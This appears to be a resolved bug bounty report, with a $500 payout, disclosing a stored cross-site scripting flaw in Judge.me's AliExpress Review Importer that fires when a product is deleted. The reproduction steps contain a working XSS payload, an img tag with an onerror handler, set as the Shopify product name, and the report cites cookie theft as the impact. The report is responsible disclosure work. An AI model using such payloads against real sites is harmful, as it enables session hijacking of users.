stored XSS on AliExpress Review Importer/Products when delete product
Medium
J
Judge.me
Submitted None
Actions:
Reported by
glister
Vulnerability Details
Technical details and impact analysis
Hi @judgeme!
`code`
Step to reproduce:
1. Go to Shopify admin and create product with name `"><"><img src=x onerror=prompt(document.domain)> img src=x onerror=prompt(document.domain)>`
2. Go to AliExpress Review Importer/Products and delete our product with name ` "><"><img src=x onerror=prompt(document.domain)> img src=x onerror=prompt(document.domain)> `
{F1544890}
3. Xss work=)
P.S. Poc wideo attach
{F1544893}
## Impact
cookie stealer
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$500.00
Submitted
Weakness
Cross-site Scripting (XSS) - Stored